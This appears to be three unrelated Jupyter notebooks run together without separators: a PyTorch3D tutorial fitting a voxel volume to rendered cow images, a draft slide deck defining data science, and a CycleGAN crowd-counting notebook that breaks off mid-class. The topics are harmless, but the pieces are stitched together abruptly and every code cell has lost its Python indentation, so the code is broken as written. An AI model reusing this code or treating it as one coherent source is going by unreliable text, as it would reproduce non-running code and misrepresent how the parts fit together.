f"py3{sys.version_info.minor}_cu",
torch.version.cuda.replace(".",""),
f"_pyt{torch.__version__[0:5:2]}"
])
!pip install pytorch3d -f https://dl.fbaipublicfiles.com/pytorch3d/packaging/wheels/{version_str}/download.html
else:
# We try to install PyTorch3D from source.
!curl -LO https://github.com/NVIDIA/cub/archive/1.10.0.tar.gz
!tar xzf 1.10.0.tar.gz
os.environ["CUB_HOME"] = os.getcwd() + "/cub-1.10.0"
!pip install 'git+https://github.com/facebookresearch/pytorch3d.git@stable'
import os
import sys
import time
import json
import glob
import torch
import math
from tqdm.notebook import tqdm
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
from IPython import display
# Data structures and functions for rendering
from pytorch3d.structures import Volumes
from pytorch3d.renderer import (
FoVPerspectiveCameras,
VolumeRenderer,
NDCGridRaysampler,
EmissionAbsorptionRaymarcher
)
from pytorch3d.transforms import so3_exponential_map
# add path for demo utils functions
sys.path.append(os.path.abspath(''))
from utils.plot_image_grid import image_grid
from utils.generate_cow_renders import generate_cow_renders
# obtain the utilized device
if torch.cuda.is_available():
device = torch.device("cuda:0")
torch.cuda.set_device(device)
else:
device = torch.device("cpu")
```
## 1. Generate images of the scene and masks
The following cell generates our training data.
It renders the cow mesh from the `fit_textured_mesh.ipynb` tutorial from several viewpoints and returns:
1. A batch of image and silhouette tensors that are produced by the cow mesh renderer.
2. A set of cameras corresponding to each render.
Note: For the purpose of this tutorial, which aims at explaining the details of volumetric rendering, we do not explain how the mesh rendering, implemented in the `generate_cow_renders` function, works. Please refer to `fit_textured_mesh.ipynb` for a detailed explanation of mesh rendering.
```
target_cameras, target_images, target_silhouettes = generate_cow_renders(num_views=40)
print(f'Generated {len(target_images)} images/silhouettes/cameras.')
```
## 2. Initialize the volumetric renderer
The following initializes a volumetric renderer that emits a ray from each pixel of a target image and samples a set of uniformly-spaced points along the ray. At each ray-point, the corresponding density and color value is obtained by querying the corresponding location in the volumetric model of the scene (the model is described & instantiated in a later cell).
The renderer is composed of a *raymarcher* and a *raysampler*.
- The *raysampler* is responsible for emitting rays from image pixels and sampling the points along them. Here, we use the `NDCGridRaysampler` which follows the standard PyTorch3D coordinate grid convention (+X from right to left; +Y from bottom to top; +Z away from the user).
- The *raymarcher* takes the densities and colors sampled along each ray and renders each ray into a color and an opacity value of the ray's source pixel. Here we use the `EmissionAbsorptionRaymarcher` which implements the standard Emission-Absorption raymarching algorithm.
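The emission-absorption compositing that the raymarcher performs can be sketched for a single ray in plain NumPy. This is an illustrative re-implementation of the idea, not PyTorch3D's actual code; it assumes per-sample densities already lie in [0, 1], as they do for `EmissionAbsorptionRaymarcher`:

```python
import numpy as np

def emission_absorption(densities, colors):
    """Composite one ray: densities (N,) in [0, 1], colors (N, 3)."""
    # Transmittance before each sample: product of (1 - density)
    # over all previous samples along the ray.
    transmittance = np.cumprod(np.concatenate(([1.0], 1.0 - densities[:-1])))
    weights = transmittance * densities
    ray_color = (weights[:, None] * colors).sum(axis=0)
    ray_opacity = weights.sum()
    return ray_color, ray_opacity

# A fully opaque first sample hides everything behind it.
color, opacity = emission_absorption(
    np.array([1.0, 0.5]), np.array([[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]])
)
print(color, opacity)  # [1. 0. 0.] 1.0
```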
```
# render_size describes the size of both sides of the
# rendered images in pixels. We set this to the same size
# as the target images. I.e. we render at the same
# size as the ground truth images.
render_size = target_images.shape[1]
# Our rendered scene is centered around (0,0,0)
# and is enclosed inside a bounding box
# whose side is roughly equal to 3.0 (world units).
volume_extent_world = 3.0
# 1) Instantiate the raysampler.
# Here, NDCGridRaysampler generates a rectangular image
# grid of rays whose coordinates follow the PyTorch3D
# coordinate conventions.
# Since we use a volume of size 128^3, we sample n_pts_per_ray=150,
# which roughly corresponds to one ray-point per voxel.
# We further set the min_depth=0.1 since there is no surface within
# 0.1 units of any camera plane.
raysampler = NDCGridRaysampler(
image_width=render_size,
image_height=render_size,
n_pts_per_ray=150,
min_depth=0.1,
max_depth=volume_extent_world,
)
# 2) Instantiate the raymarcher.
# Here, we use the standard EmissionAbsorptionRaymarcher
# which marches along each ray in order to render
# each ray into a single 3D color vector
# and an opacity scalar.
raymarcher = EmissionAbsorptionRaymarcher()
# Finally, instantiate the volumetric renderer
# with the raysampler and raymarcher objects.
renderer = VolumeRenderer(
raysampler=raysampler, raymarcher=raymarcher,
)
```
## 3. Initialize the volumetric model
Next we instantiate a volumetric model of the scene. This quantizes the 3D space into cubical voxels, where each voxel is described by a 3D vector representing the voxel's RGB color and a density scalar describing the voxel's opacity (ranging between 0 and 1; the higher, the more opaque).
In order to ensure the densities and colors lie in [0, 1], we represent both volume colors and densities in logarithmic space. During the forward pass of the model, the log-space values are passed through the sigmoid function to bring them into the correct range.
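As a quick sanity check of this parameterization (pure Python, no PyTorch needed): a log-space value of -4.0 maps to a near-zero density, while 0.0 maps to a neutral 0.5:

```python
import math

def sigmoid(x):
    # Same mapping as torch.sigmoid, for a scalar
    return 1.0 / (1.0 + math.exp(-x))

print(round(sigmoid(-4.0), 3))  # 0.018 -> nearly transparent voxel
print(sigmoid(0.0))             # 0.5   -> neutral gray color
```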
Additionally, `VolumeModel` contains the renderer object. This object stays unaltered throughout the optimization.
In this cell we also define the `huber` loss function which computes the discrepancy between the rendered colors and masks.
```
class VolumeModel(torch.nn.Module):
def __init__(self, renderer, volume_size=[64] * 3, voxel_size=0.1):
super().__init__()
# After evaluating torch.sigmoid(self.log_densities), we get
# densities close to zero.
self.log_densities = torch.nn.Parameter(-4.0 * torch.ones(1, *volume_size))
# After evaluating torch.sigmoid(self.log_colors), we get
# a neutral gray color everywhere.
self.log_colors = torch.nn.Parameter(torch.zeros(3, *volume_size))
self._voxel_size = voxel_size
# Store the renderer module as well.
self._renderer = renderer
def forward(self, cameras):
batch_size = cameras.R.shape[0]
# Convert the log-space values to the densities/colors
densities = torch.sigmoid(self.log_densities)
colors = torch.sigmoid(self.log_colors)
# Instantiate the Volumes object, making sure
# the densities and colors are correctly
# expanded batch_size-times.
volumes = Volumes(
densities = densities[None].expand(
batch_size, *self.log_densities.shape),
features = colors[None].expand(
batch_size, *self.log_colors.shape),
voxel_size=self._voxel_size,
)
# Given cameras and volumes, run the renderer
# and return only the first output value
# (the 2nd output is a representation of the sampled
# rays which can be omitted for our purpose).
return self._renderer(cameras=cameras, volumes=volumes)[0]
# A helper function for evaluating the smooth L1 (huber) loss
# between the rendered silhouettes and colors.
def huber(x, y, scaling=0.1):
diff_sq = (x - y) ** 2
loss = ((1 + diff_sq / (scaling**2)).clamp(1e-4).sqrt() - 1) * float(scaling)
return loss
```
## 4. Fit the volume
Here we carry out the volume fitting with differentiable rendering.
In order to fit the volume, we render it from the viewpoints of the `target_cameras`
and compare the resulting renders with the observed `target_images` and `target_silhouettes`.
The comparison is done by evaluating the mean huber (smooth-l1) error between corresponding
pairs of `target_images`/`rendered_images` and `target_silhouettes`/`rendered_silhouettes`.
```
# First move all relevant variables to the correct device.
target_cameras = target_cameras.to(device)
target_images = target_images.to(device)
target_silhouettes = target_silhouettes.to(device)
# Instantiate the volumetric model.
# We use a cubical volume with the size of
# one side = 128. The size of each voxel of the volume
# is set to volume_extent_world / volume_size s.t. the
# volume represents the space enclosed in a 3D bounding box
# centered at (0, 0, 0) with the size of each side equal to 3.
volume_size = 128
volume_model = VolumeModel(
renderer,
volume_size=[volume_size] * 3,
voxel_size = volume_extent_world / volume_size,
).to(device)
# Instantiate the Adam optimizer. We set its master learning rate to 0.1.
lr = 0.1
optimizer = torch.optim.Adam(volume_model.parameters(), lr=lr)
# We do 300 Adam iterations and sample 10 random images in each minibatch.
batch_size = 10
n_iter = 300
for iteration in range(n_iter):
# Once we reach 75% of the iterations,
# decrease the learning rate of the optimizer 10-fold.
if iteration == round(n_iter * 0.75):
print('Decreasing LR 10-fold ...')
optimizer = torch.optim.Adam(
volume_model.parameters(), lr=lr * 0.1
)
# Zero the optimizer gradient.
optimizer.zero_grad()
# Sample random batch indices.
batch_idx = torch.randperm(len(target_cameras))[:batch_size]
# Sample the minibatch of cameras.
batch_cameras = FoVPerspectiveCameras(
R = target_cameras.R[batch_idx],
T = target_cameras.T[batch_idx],
znear = target_cameras.znear[batch_idx],
zfar = target_cameras.zfar[batch_idx],
aspect_ratio = target_cameras.aspect_ratio[batch_idx],
fov = target_cameras.fov[batch_idx],
device = device,
)
# Evaluate the volumetric model.
rendered_images, rendered_silhouettes = volume_model(
batch_cameras
).split([3, 1], dim=-1)
# Compute the silhouette error as the mean huber
# loss between the predicted masks and the
# target silhouettes.
sil_err = huber(
rendered_silhouettes[..., 0], target_silhouettes[batch_idx],
).abs().mean()
# Compute the color error as the mean huber
# loss between the rendered colors and the
# target ground truth images.
color_err = huber(
rendered_images, target_images[batch_idx],
).abs().mean()
# The optimization loss is a simple
# sum of the color and silhouette errors.
loss = color_err + sil_err
# Print the current values of the losses.
if iteration % 10 == 0:
print(
f'Iteration {iteration:05d}:'
+ f' color_err = {float(color_err):1.2e}'
+ f' mask_err = {float(sil_err):1.2e}'
)
# Take the optimization step.
loss.backward()
optimizer.step()
# Visualize the renders every 40 iterations.
if iteration % 40 == 0:
# Visualize only a single randomly selected element of the batch.
im_show_idx = int(torch.randint(low=0, high=batch_size, size=(1,)))
fig, ax = plt.subplots(2, 2, figsize=(10, 10))
ax = ax.ravel()
clamp_and_detach = lambda x: x.clamp(0.0, 1.0).cpu().detach().numpy()
ax[0].imshow(clamp_and_detach(rendered_images[im_show_idx]))
ax[1].imshow(clamp_and_detach(target_images[batch_idx[im_show_idx], ..., :3]))
ax[2].imshow(clamp_and_detach(rendered_silhouettes[im_show_idx, ..., 0]))
ax[3].imshow(clamp_and_detach(target_silhouettes[batch_idx[im_show_idx]]))
for ax_, title_ in zip(
ax,
("rendered image", "target image", "rendered silhouette", "target silhouette")
):
ax_.grid(False)
ax_.axis("off")
ax_.set_title(title_)
fig.canvas.draw(); fig.show()
display.clear_output(wait=True)
display.display(fig)
```
## 5. Visualizing the optimized volume
Finally, we visualize the optimized volume by rendering from multiple viewpoints that rotate around the volume's y-axis.
```
def generate_rotating_volume(volume_model, n_frames = 50):
logRs = torch.zeros(n_frames, 3, device=device)
logRs[:, 1] = torch.linspace(0.0, 2.0 * 3.14, n_frames, device=device)
Rs = so3_exponential_map(logRs)
Ts = torch.zeros(n_frames, 3, device=device)
Ts[:, 2] = 2.7
frames = []
print('Generating rotating volume ...')
for R, T in zip(tqdm(Rs), Ts):
camera = FoVPerspectiveCameras(
R=R[None],
T=T[None],
znear = target_cameras.znear[0],
zfar = target_cameras.zfar[0],
aspect_ratio = target_cameras.aspect_ratio[0],
fov = target_cameras.fov[0],
device=device,
)
frames.append(volume_model(camera)[..., :3].clamp(0.0, 1.0))
return torch.cat(frames)
with torch.no_grad():
rotating_volume_frames = generate_rotating_volume(volume_model, n_frames=7*4)
image_grid(rotating_volume_frames.clamp(0., 1.).cpu().numpy(), rows=4, cols=7, rgb=True, fill=True)
plt.show()
```
## 6. Conclusion
In this tutorial, we have shown how to optimize a 3D volumetric representation of a scene such that the renders of the volume from known viewpoints match the observed images for each viewpoint. The rendering was carried out using PyTorch3D's volumetric renderer, composed of an `NDCGridRaysampler` and an `EmissionAbsorptionRaymarcher`.
# Data Science Training `#01` (draft)
# Roadmap
## 01. What is data science ?
## 10. How data science fits into the big picture
## 11. Practical data science workflows (next)
## 01. What is data science ?
[](https://hbr.org/2012/10/data-scientist-the-sexiest-job-of-the-21st-century)
## 01.1. Definitions / Venn war
The term of **data science** itself **is still contested**, but a concise definition can be brought here:
> To do data science, you have to be able to **find and process large datasets**. You’ll often need to understand and use **programming**, **math**, and **technical communication** skills. ***You’ll need to be a unicorn that can put together a lot of different skillsets***.
> + Roger Huang, **Springboard** blog - [source](https://www.springboard.com/blog/data-science-definition/)
A longer definition might be the one offered by the now famous HBR article, **Data Scientist: The Sexiest Job of the 21st Century** (Oct 2012):
> [...] what data scientists do is **make discoveries while swimming in data** [...] They identify rich data sources, **join them with other**, potentially incomplete data sources, and **clean the resulting set**. [...]
> [...] Often they are **creative in displaying information visually** and making the **patterns** they find clear and compelling. **They advise** executives and product managers on the **implications of the data for products, processes, and decisions**.
> Given the nascent state of their trade, it often falls to data scientists to **fashion their own tools and even conduct academic-style research**. Yahoo, one of the firms that **employed a group of data scientists** early on, was **instrumental in developing Hadoop.** [...]
> **What kind of person does all this?** What abilities make a data scientist successful? Think of him or her as a **hybrid of data hacker, analyst, communicator, and trusted adviser**. The combination is extremely powerful—and rare.
Source: [hbr.org/2012/10/data-scientist-the-sexiest-job-of-the-21st-century](https://hbr.org/2012/10/data-scientist-the-sexiest-job-of-the-21st-century)
<center>
**The most frequently cited source**:

Source: [drewconway.com/zia/2013/3/26/the-data-science-venn-diagram](http://drewconway.com/zia/2013/3/26/the-data-science-venn-diagram)
</center>
<center>
**It gets crazier**:

</center>
<center>
[](http://datascience.nyu.edu/what-is-data-science/)
Source: [datascience.nyu.edu/what-is-data-science/](http://datascience.nyu.edu/what-is-data-science/)
</center>

<center>

<!-- <img src="assets/map_venn.png" width="800px" height="auto" /> -->
Source: `Deep Learning` - **Ian Goodfellow** and **Yoshua Bengio** and Aaron Courville - [source](http://www.deeplearningbook.org/contents/intro.html) (pg. 9)
</center>
## 01.2. History of DS
<center>

**SIGKDD** is the ACM's **Special Interest Group** (SIG) on **Knowledge Discovery and Data Mining** (official ACM SIG since 1998, started in 1995).
</center>
<center>
**Data Science: an Action Plan for Expanding the Technical Areas of the Field of Statistics**
William S. Cleveland, Statistics Research, Bell Labs
First published: **April 2001**
- [Wiley page](http://onlinelibrary.wiley.com/doi/10.1111/j.1751-5823.2001.tb00477.x/abstract), [fulltext](http://www.datascienceassn.org/sites/default/files/Data%20Science%20An%20Action%20Plan%20for%20Expanding%20the%20Technical%20Areas%20of%20the%20Field%20of%20Statistics.pdf)
</center>
> This document describes a **plan to enlarge the major areas of technical work of the field of statistics**. Because
the plan is ambitious and **implies substantial change**, the **altered field will be called “data science.”** [...]
> The six areas and their percentages are the following:
+ **(25%) Multidisciplinary Investigations**: data analysis collaborations in a collection of subject matter
areas.
+ **(20%) Models and Methods for Data**: statistical models; methods of model building; methods of estimation
and distribution based on probabilistic inference.
+ **(15%) Computing with Data**: hardware systems; software systems; computational algorithms.
+ **(15%) Pedagogy**: curriculum planning and approaches to teaching for elementary school, secondary
school, college, graduate school, continuing education, and corporate training.
+ **(5%) Tool Evaluation**: surveys of tools in use in practice, surveys of perceived needs for new tools, and
studies of the processes for developing new tools.
+ **(20%) Theory**: foundations of data science; general approaches to models and methods, to computing
with data, to teaching, and to tool evaluation; mathematical investigations of models and methods, of
computing with data, of teaching, and of evaluation.
## 10. How data science fits into the big picture
+ statistics: statistics
+ learning and generalizing: ML / ANN
+ bayesian generalization - one-shot learning, pymc ...
+ optimization field: MCDA / MODA

Machine learning types:

<center><img src="assets/map_sklearn.png" width="900" height="600" /></center>
## 11. Practical data science workflows
```
%%svg
<svg width="720" height="80"><g>
<g><rect x="0" y="0" width="150" height="70" fill="#FFF" stroke="#000"></rect>
<text x="10" y="30" font-family="Verdana" font-size="20" fill="#444">Analysis</text></g>
<g transform="translate(170,0)">
<polyline fill="none" stroke="#AAA" stroke-width="1" stroke-linecap="round" stroke-linejoin="round" points="
0.375,0.375 45.63,38.087 0.375,75.8 "/>
</g>
<g transform="translate(230,0)">
<rect x="0" y="0" width="400" height="70" fill="#FFF" stroke="#000"></rect>
<text x="10" y="30" font-family="Verdana" font-size="20" fill="#444">Modelling</text></g>
</g></svg>
```
### Machine learning steps
> Asking the right question => Preparing Data => Selecting the algorithm => Training the model
The process may require returning to a previous step, such as:
- changing the question
- sanitizing, extending the data
- changing the algorithm
- (supervised) extending the test data
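As a toy illustration of these four steps (question → data → algorithm → training), here is a self-contained nearest-centroid classifier in plain Python; the data and the "algorithm" are deliberately trivial and only meant to make the workflow concrete:

```python
# Question: can we predict a point's class from its single feature?
# Data: toy one-dimensional samples with two classes.
train = [(1.0, 'a'), (1.2, 'a'), (0.8, 'a'), (4.0, 'b'), (4.2, 'b')]

# Algorithm selection: a nearest-centroid classifier.
def fit(samples):
    centroids = {}
    for x, label in samples:
        centroids.setdefault(label, []).append(x)
    return {label: sum(xs) / len(xs) for label, xs in centroids.items()}

def predict(centroids, x):
    return min(centroids, key=lambda label: abs(centroids[label] - x))

# Training and a quick check; poor results would send us back to an
# earlier step (more data, another algorithm, or a reframed question).
model = fit(train)
print(predict(model, 1.1), predict(model, 3.9))  # a b
```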
# Links
+ **trainings** to be found here: https://github.com/xR86/ml-stuff/tree/master/labs-machine-learning
+ **01. What is data science ?** sources:
+ 01.1. Definitions / Venn war
- quora responses are resourceful - [What is data science? - Quora](https://www.quora.com/What-is-data-science) and [What is a data scientist? - Quora](https://www.quora.com/What-is-a-data-scientist-3)
+ 01.2. History of DS
- [blogs.nvidia.com/blog/2016/07/29/whats-difference-artificial-intelligence-machine-learning-deep-learning-ai/](https://blogs.nvidia.com/blog/2016/07/29/whats-difference-artificial-intelligence-machine-learning-deep-learning-ai/)
- [kdnuggets.com/2016/10/battle-data-science-venn-diagrams.html](http://www.kdnuggets.com/2016/10/battle-data-science-venn-diagrams.html)
- [slideshare.net/AltonAlexander/a-successful-data-science-proof-of-concept-in-7-pragmatic-steps](https://www.slideshare.net/AltonAlexander/a-successful-data-science-proof-of-concept-in-7-pragmatic-steps)
+ Extra resources
- when it comes to deep learning, pay attention to Canadian uni courses - [iro.umontreal.ca/~bengioy/talks/lisbon-mlss-19juillet2015.pdf](http://www.iro.umontreal.ca/~bengioy/talks/lisbon-mlss-19juillet2015.pdf)
- [unsupervised vs supervised ML](https://stats.stackexchange.com/questions/110395/what-are-basic-differences-between-kernel-approaches-to-unsupervised-and-supervi)
- [amazon.com/Think-Like-Scientist-step-step/dp/1633430278](https://www.amazon.com/Think-Like-Scientist-step-step/dp/1633430278)
- [jixta.files.wordpress.com/2015/11/machinelearningalgorithms.png](https://jixta.files.wordpress.com/2015/11/machinelearningalgorithms.png)
- [images.slideplayer.com/32/9836672/slides/slide_3.jpg](http://images.slideplayer.com/32/9836672/slides/slide_3.jpg)
<center>
<h1>Thanks !</h1>
</center>
---
```
from __future__ import print_function, division
import os, sys
import torch
import pandas as pd
from skimage import io, transform
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils
from PIL import Image
dataroot = '/home/abhijit/Downloads/video frames/crowd/'
csv = '/home/abhijit/Downloads/video frames/optical flow/optical flow/crowdgroundtruth.xlsx'
dataroot_2 = '/home/abhijit/Downloads/video frames/optical flow/'
# Number of workers for dataloader
workers = 2
# Batch size during training
batch_size = 128
# Spatial size of training images. All images will be resized to this
# size using a transformer.
image_size = 64
# Number of channels in the training images. For color images this is 3
nc = 3
# Size of z latent vector (i.e. size of generator input)
nz = 100
# Size of feature maps in generator
ngf = 64
# Size of feature maps in discriminator
ndf = 64
# Number of training epochs
num_epochs = 5
# Learning rate for optimizers
lr = 0.0002
# Beta1 hyperparam for Adam optimizers
beta1 = 0.5
# Number of GPUs available. Use 0 for CPU mode.
ngpu = 1
```
# Reading The Ground Truth
```
all_ = pd.read_excel(csv, header = 0)
from sklearn.model_selection import train_test_split
train_df, test_df = train_test_split(all_, test_size=0.3, random_state = 0)
valid_df, test_df = train_test_split(test_df, test_size=.66, random_state = 0)
```
# DataLoader for Cycle GAN
```
class GANDataset(Dataset):
def __init__(self, csv_file,root_dir,df,root_dir_2, transform=None):
self.landmarks_frame = pd.read_excel(csv_file, header = 0)
self.read_number = pd.read_excel(csv_file,header = 1)
self.root_dir = root_dir
self.root_dir_2 = root_dir_2
self.transform = transform
self.df = df
def __len__(self):
#return len(os.listdir(self.root_dir_2))
return len(self.df)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
img_name = self.df.iloc[idx]['Frame1']
number_left = self.df.iloc[idx,3]
number_right = self.df.iloc[idx,4]
#number_combined = self.df.iloc[idx,5]
number_combined = number_left + number_right
#number_all = self.landmarks_frame['left_to_right'][idx:idx]
#number_all = 0
number_all = np.array([number_left,number_right, number_combined])
ix = ['scene1','scene2','scene3','scene4','scene5','scene6','scene7','scene8','scene9', 'scene10','scene11','scene12','scene13','scene14','scene15']
jx = ['scene10','scene11','scene12','scene13','scene14','scene15']
#img_name = 'scene6medcam1frame780'
i = ''
x = 0
for j in jx:
if j in img_name:
x = 1
break
i = j
if x==0:
for i in ix:
if i in img_name:
break
dense = ['low', 'med', 'high']
cam = ['cam1', 'cam2', 'cam3']
occlu = ['', 'occlu']
for den in dense:
if den in img_name:
break
for c in cam:
if c in img_name:
break
if 'occlu' in img_name:
occ = 'occlu'
else:
occ= ''
#image = io.imread(self.root_dir+'scene' + str(i)+'/'+'scene'+str(i)+den+c+occ+'/'+img_name )
img = self.root_dir+ str(i)+'/'+str(i)+den+c+occ+'/'+img_name+'.jpg'
#optical_flow = self.root_dir_2 + str(i)+'/'+str(i)+den+c+occ+'/'+img_name+'.png'
image = io.imread(img)
image = Image.fromarray(image)
#op_flow = io.imread(optical_flow)
#op_flow = Image.fromarray(op_flow)
origi = image
image = self.transform(image)
#op_flow = self.transform(op_flow)
#dirs2 = os.listdir(self.root_dir_2)
#image_2 = self.root_dir_2+ '/' +dirs2[idx]
image_2 = img
image_2 = Image.open(image_2)
#image_2 = convert_gray2rgb(image_2)
image_2 = image_2.convert("RGB")
#image = convert_gray2rgb(image)
image_2 = self.transform(image_2)
every_thing = {'image': image,
'img_root':img,
'image_2': image_2,
'img_2_name': img_name,
'left_to_right': number_left,
'right_to_left': number_right,
'combined':number_combined,
'all':number_all
}
return every_thing
from torchvision import transforms
train_dataset = GANDataset(csv, dataroot, all_,dataroot,
transform = transforms.Compose([ transforms.Resize([256,256]), transforms.ToTensor(),
transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])]))
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=1, shuffle=True)
```
# Modified Cycle GAN Structure
```
import torch.nn as nn
import torch.nn.functional as F
class ResidualBlock(nn.Module):
def __init__(self, in_features):
super(ResidualBlock, self).__init__()
conv_block = [ nn.ReflectionPad2d(1),
nn.Conv2d(in_features, in_features, 3),
nn.InstanceNorm2d(in_features),
nn.ReLU(inplace=True),
nn.ReflectionPad2d(1),
nn.Conv2d(in_features, in_features, 3),
nn.InstanceNorm2d(in_features) ]
self.conv_block = nn.Sequential(*conv_block)
def forward(self, x):
return x + self.conv_block(x)
class Generator(nn.Module):
def __init__(self, input_nc, output_nc, n_residual_blocks=9):
super(Generator, self).__init__()
# Initial convolution block
model = [ nn.ReflectionPad2d(3),
nn.Conv2d(input_nc, 64, 7),
nn.InstanceNorm2d(64),
nn.ReLU(inplace=True) ]
# Downsampling
in_features = 64
out_features = in_features*2
for _ in range(2):
model += [ nn.Conv2d(in_features, out_features, 3, stride=2, padding=1),
nn.InstanceNorm2d(out_features),
nn.ReLU(inplace=True) ]
in_features = out_features
out_features = in_features*2
# Residual blocks
for _ in range(n_residual_blocks):
model += [ResidualBlock(in_features)]
# Upsampling
out_features = in_features//2
for _ in range(2):
model += [ nn.ConvTranspose2d(in_features, out_features, 3, stride=2, padding=1, output_padding=1),
nn.InstanceNorm2d(out_features),
nn.ReLU(inplace=True) ]
in_features = out_features
out_features = in_features//2
# Output layer
model += [ nn.ReflectionPad2d(3),
nn.Conv2d(64, output_nc, 7),
nn.Tanh() ]
self.model = nn.Sequential(*model)
def forward(self, x):
return self.model(x)
class Discriminator(nn.Module):
def __init__(self, input_nc):
super(Discriminator, self).__init__()
# A bunch of convolutions one after another
model = [ nn.Conv2d(input_nc, 64, 4, stride=2, padding=1),
nn.LeakyReLU(0.2, inplace=True) ]
#model += [ nn.Conv2d(32, 32, 4, stride=2, padding=1),
# nn.InstanceNorm2d(128),
# nn.LeakyReLU(0.2, inplace=True) ]
#model += [ nn.Conv2d(128, 256, 4, stride=2, padding=1),
# nn.InstanceNorm2d(256),
# nn.LeakyReLU(0.2, inplace=True) ]
#model += [ nn.Conv2d(64, 128, 4, padding=1),
# nn.InstanceNorm2d(512),
# nn.LeakyReLU(0.2, inplace=True) ]
# FCN classification layer
model += [nn.Conv2d(64, 1, 4, padding=1)]
self.model = nn.Sequential(*model)
def forward(self, x):
x = self.model(x)
# Average pooling and flatten
return F.avg_pool2d(x, x.size()[2:]).view(x.size()[0], -1)
netG_A2B = Generator(3, 3)
netG_B2A = Generator(3, 3)
netD_A = Discriminator(3)
netD_B = Discriminator(3)
netG_A2B.cuda()
#torch.cuda.empty_cache()
netG_B2A.cuda()
#torch.cuda.empty_cache()
netD_A.cuda()
#torch.cuda.empty_cache()
netD_B.cuda()
#torch.cuda.empty_cache()
```
# Generator and Discriminator Initialization
```
def weights_init_normal(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
torch.nn.init.normal_(m.weight.data, 0.0, 0.02)
elif classname.find('BatchNorm2d') != -1:
torch.nn.init.normal_(m.weight.data, 1.0, 0.02)
torch.nn.init.constant_(m.bias.data, 0.0)
netG_A2B.apply(weights_init_normal)
netG_B2A.apply(weights_init_normal)
netD_A.apply(weights_init_normal)
netD_B.apply(weights_init_normal)
```
# SSIM
```
import torch
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
from math import exp
def gaussian(window_size, sigma):
gauss = torch.Tensor([exp(-(x - window_size//2)**2/float(2*sigma**2)) for x in range(window_size)])
return gauss/gauss.sum()
def create_window(window_size, channel):
_1D_window = gaussian(window_size, 1.5).unsqueeze(1)
_2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze(0).unsqueeze(0)
window = Variable(_2D_window.expand(channel, 1, window_size, window_size).contiguous())
return window
def _ssim(img1, img2, window, window_size, channel, size_average = True):
mu1 = F.conv2d(img1, window, padding = window_size//2, groups = channel)
mu2 = F.conv2d(img2, window, padding = window_size//2, groups = channel)
mu1_sq = mu1.pow(2)
mu2_sq = mu2.pow(2)
mu1_mu2 = mu1*mu2
sigma1_sq = F.conv2d(img1*img1, window, padding = window_size//2, groups = channel) - mu1_sq
sigma2_sq = F.conv2d(img2*img2, window, padding = window_size//2, groups = channel) - mu2_sq
sigma12 = F.conv2d(img1*img2, window, padding = window_size//2, groups = channel) - mu1_mu2
C1 = 0.01**2
C2 = 0.03**2
ssim_map = ((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*(sigma1_sq + sigma2_sq + C2))
if size_average:
return ssim_map.mean()
else:
return ssim_map.mean(1).mean(1).mean(1)
class SSIM(torch.nn.Module):
def __init__(self, window_size = 11, size_average = True):
super(SSIM, self).__init__()
self.window_size = window_size
self.size_average = size_average
self.channel = 1
self.window = create_window(window_size, self.channel)
def forward(self, img1, img2):
(_, channel, _, _) = img1.size()
if channel == self.channel and self.window.data.type() == img1.data.type():
window = self.window
else:
window = create_window(self.window_size, channel)
if img1.is_cuda:
window = window.cuda(img1.get_device())
window = window.type_as(img1)
self.window = window
self.channel = channel
return _ssim(img1, img2, window, self.window_size, channel, self.size_average)
def ssim(img1, img2, window_size = 11, size_average = True):
(_, channel, _, _) = img1.size()
window = create_window(window_size, channel)
if img1.is_cuda:
window = window.cuda(img1.get_device())
window = window.type_as(img1)
return _ssim(img1, img2, window, window_size, channel, size_average)
```
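As a sanity check on the formula above, here is a pure-Python sketch of SSIM for two flat patches, where the convolution-based local statistics reduce to plain means and (co)variances. `ssim_flat` is a helper name introduced here for illustration only, using the same C1 = 0.01² and C2 = 0.03² constants.

```python
# Scalar SSIM for two equal-length lists of pixel values (assumed in [0, 1]),
# mirroring the constants C1 = 0.01**2 and C2 = 0.03**2 used above.
def ssim_flat(x, y, C1=0.01 ** 2, C2=0.03 ** 2):
    n = len(x)
    mu1, mu2 = sum(x) / n, sum(y) / n
    sigma1_sq = sum((v - mu1) ** 2 for v in x) / n
    sigma2_sq = sum((v - mu2) ** 2 for v in y) / n
    sigma12 = sum((a - mu1) * (b - mu2) for a, b in zip(x, y)) / n
    return ((2 * mu1 * mu2 + C1) * (2 * sigma12 + C2)) / \
           ((mu1 ** 2 + mu2 ** 2 + C1) * (sigma1_sq + sigma2_sq + C2))

img = [0.2, 0.4, 0.6, 0.8]
print(round(ssim_flat(img, img), 6))  # 1.0 (identical patches score perfectly)
```

The torch `_ssim` above computes exactly these statistics, but locally at every pixel via Gaussian-windowed convolutions.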
# Losses for Cycle GAN
```
criterion_GAN = torch.nn.MSELoss()
criterion_cycle = torch.nn.L1Loss()
criterion_identity = torch.nn.L1Loss()
```
# Optimizer for Cycle GAN Training
```
import itertools
optimizer_G = torch.optim.Adam(itertools.chain(netG_A2B.parameters(), netG_B2A.parameters()),
lr= .0002, betas=(0.5, 0.999))
optimizer_D_A = torch.optim.Adam(netD_A.parameters(), lr= .0002, betas=(0.5, 0.999))
optimizer_D_B = torch.optim.Adam(netD_B.parameters(), lr= .0002, betas=(0.5, 0.999))
```
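Both generators are updated by a single Adam optimizer because `itertools.chain` lazily concatenates their parameter iterators; a minimal illustration with placeholder parameter names:

```python
import itertools

# chain() yields every element of each iterable in turn, so the optimizer
# would see the parameters of netG_A2B followed by those of netG_B2A.
params_a2b = ['gA_w1', 'gA_w2']   # stand-ins for tensor parameters
params_b2a = ['gB_w1']
joint = list(itertools.chain(params_a2b, params_b2a))
print(joint)  # ['gA_w1', 'gA_w2', 'gB_w1']
```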
# Learning Rate Scheduler for Cycle GAN Training
```
from torch.optim import lr_scheduler
class LambdaLR():
def __init__(self, n_epochs, offset, decay_start_epoch):
assert ((n_epochs - decay_start_epoch) > 0), "Decay must start before the training session ends!"
self.n_epochs = n_epochs
self.offset = offset
